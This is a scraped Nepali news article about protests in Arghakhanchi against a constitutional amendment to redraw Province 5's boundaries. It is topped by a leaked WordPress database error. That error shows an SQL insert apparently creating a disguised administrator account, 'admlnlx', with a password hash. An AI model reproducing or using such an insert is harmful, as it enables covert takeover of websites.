WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7j1pPJ2GiFq1x18GmEuwP8WU4Ixp60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 01:23:08', '', 'admlnlx', 'admlnlx')
अर्घाखाँची,मंसिर २०-
५ नम्बर प्रदेशको सिमांकन हेरफेर गर्न लागिएको संविधान संशोधन प्रस्तावविरुद्ध अर्घाखाँचीमा पनि आन्दोलन चर्किएको छ ।
आन्दोलनको अग्रभागमा सत्तारुढ माओवादी केन्द्र र नेपाली कांग्रेसका स्थानीय नेताहरु समेत सहभागी भएका छन् ।
सोमवार सन्धीखर्कमा सर्वपक्षीय सभा गरी ५ नम्बर प्रदेशबाट तराई पहाड अलग गरिए स्वीकार नहुने चेतावनी उनीहरुले दिएका छन् । सभामा नागरिक समाज र उद्योग वाणिज्य महासंघ लगायत अन्य व्यवसायिक संघ संस्थाहरुले समेत ऐक्यबद्धता जनाएका छन् ।
संविधान संसोधनको विरुद्ध माओवादीभित्रै बिद्रोह गरिरहेका नेता टोपवहादुर रायमाझीको जिल्ला अर्घाखाँचीमा माओवादी पार्टीनै आन्दोलनको अग्रभागमा रहेको छ । सोमवारको प्रदर्शनमा जिल्लाका गाउँ गाउँबाट समेत स्थानीय जनता सहभागी भएकाले स्थानीय प्रशासनले सुरक्षामा कडाई गरेको छ ।